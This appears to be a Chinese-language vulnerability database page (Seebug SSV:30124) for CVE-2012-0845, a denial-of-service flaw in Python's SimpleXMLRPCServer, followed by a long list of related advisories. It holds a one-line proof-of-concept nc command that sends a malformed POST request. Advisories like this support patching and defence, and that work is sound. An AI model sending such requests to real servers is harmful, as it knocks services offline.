Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:30124
HistoryFeb 16, 2012 - 12:00 a.m.

Python SimpleXMLRPCServer远程拒绝服务漏洞

2012-02-1600:00:00
Root
www.seebug.org
21

0.16 Low

EPSS

Percentile

95.4%

JSON

BUGTRAQ ID: 51996
CVE ID: CVE-2012-0845

Python是一种面向对象、直译式计算机程序设计语言,也是一种功能强大的通用型语言。

Python在实现上存在远程拒绝服务漏洞,攻击者可通过特制的HTTP POST请求利用此漏洞造成拒绝服务。

此漏洞源于在处理POST请求时,"SimpleXMLRPCRequestHandler.do_POST()"方法没有正确处理EOF,可通过特制的请求导致较高的CPU消耗。
0
python 3.x
python 2.7.x
厂商补丁:

Python

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

www.python.org


                                                $ echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345

Related

ubuntucve 1
nessus 31
veracode 3
freebsd 1
openvas 47
cve 1
amazon 3
prion 1
debiancve 1
fedora 7
centos 1
redhat 1
ubuntu 6
oraclelinux 1
f5 1
securityvulns 2
osv 1
gentoo 1
debian 1
ibm 1
suse 1
ubuntucve
ubuntucve
CVE-2012-0845
2012-02-14 00:00:00
nessus
nessus
Amazon Linux AMI : python27 (ALAS-2012-81)
2013-09-04 00:00:00
FreeBSD : Python -- DoS via malformed XML-RPC / HTTP POST request (b4f8be9e-56b2-11e1-9fb7-003067b2972c)
2012-02-14 00:00:00
Amazon Linux AMI : python26 (ALAS-2012-80)
2013-09-04 00:00:00
veracode
veracode
Denial Of Service (DoS)
2019-05-02 04:41:53
Denial Of Service (DoS)
2019-05-02 04:41:53
Information Disclosure
2019-05-02 04:41:53
freebsd
freebsd
Python -- DoS via malformed XML-RPC / HTTP POST request
2012-02-13 00:00:00
openvas
openvas
FreeBSD Ports: python32
2012-03-12 00:00:00
Amazon Linux: Security Advisory (ALAS-2012-80)
2015-09-08 00:00:00
FreeBSD Ports: python32
2012-03-12 00:00:00
cve
cve
CVE-2012-0845
2012-10-05 21:55:00
amazon
amazon
Medium: python27
2012-05-21 16:52:00
Medium: python26
2012-05-21 16:50:00
Low: python26
2012-07-05 16:16:00
prion
prion
Design/Logic Flaw
2012-10-05 21:55:00
debiancve
debiancve
CVE-2012-0845
2012-10-05 21:55:00
fedora
fedora
[SECURITY] Fedora 17 Update: python-docs-2.7.3-1.fc17
2012-05-02 04:50:10
[SECURITY] Fedora 16 Update: python-docs-2.7.3-1.fc16
2012-05-06 01:26:43
[SECURITY] Fedora 16 Update: python-2.7.3-1.fc16
2012-05-06 01:26:43
centos
centos
python, tkinter security update
2012-06-18 16:35:36
redhat
redhat
(RHSA-2012:0744) Moderate: python security update
2012-06-18 00:00:00
ubuntu
ubuntu
Python 3.2 vulnerabilities
2012-10-23 00:00:00
Python 2.7 vulnerabilities
2012-10-02 00:00:00
Python 3.1 vulnerabilities
2012-10-24 00:00:00
oraclelinux
oraclelinux
python security update
2012-06-18 00:00:00
f5
f5
K75910138 : Python vulnerabilities CVE-2011-1521, CVE-2011-4940, CVE-2011-4944, CVE-2012-0845, and CVE-2012-1150
2018-09-11 00:00:00
securityvulns
securityvulns
python multiple security vulnerabilities
2012-07-29 00:00:00
[ MDVSA-2012:096-1 ] python
2012-07-09 00:00:00
osv
osv
python2.6 - security update
2014-07-31 00:00:00
gentoo
gentoo
Python: Multiple vulnerabilities
2014-01-06 00:00:00
debian
debian
[DLA 25-1] python2.6 security update
2014-07-31 21:07:32
ibm
ibm
Security Bulletin: Multiple Vulnerabilities in python 2.6.4 used in OS Image for AIX shipped with IBM Cloud Pak System
2020-05-06 11:57:04
suse
suse
Security update for python3 (important)
2020-01-21 00:00:00

0.16 Low

EPSS

Percentile

95.4%

JSON
Related for SSV:30124
ubuntucve1nessus31veracode3freebsd1openvas47cve1amazon3prion1debiancve1fedora7centos1redhat1ubuntu6oraclelinux1f51securityvulns2osv1gentoo1debian1ibm1suse1